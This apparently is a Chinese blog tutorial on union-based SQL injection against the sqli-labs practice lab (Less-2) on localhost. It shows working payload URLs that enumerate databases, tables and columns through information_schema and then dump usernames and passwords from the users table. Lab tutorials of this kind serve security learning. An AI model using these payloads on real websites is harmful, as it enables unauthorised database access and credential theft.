SQL注入之高权限注入-下

SQL注入之高权限注入-下

Deng YongJie's blog 1,146 2023-02-25

SQL注入之高权限注入

1.注入流程与上节实例相同

查询所有数据库名称

202275555

http://localhost/sqli-labs-master/Less-2/?id=-2%20union%20select%201,group_concat(schema_name),3%20from%20information_schema.schemata

查询数据库对应的表名

2022175831

http://localhost/sqli-labs-master/Less-2/?id=-2%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479

security库名转换16进制,等于:7365637572697479

查询表名对应的字段名

2022175939

http://localhost/sqli-labs-master/Less-2/?id=-2%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=0x7573657273

表名users转换16进制,等于:7573657273

查询数据

202280103

http://localhost/sqli-labs-master/Less-2/?id=-2%20union%20select%201,username,password%20from%20security.users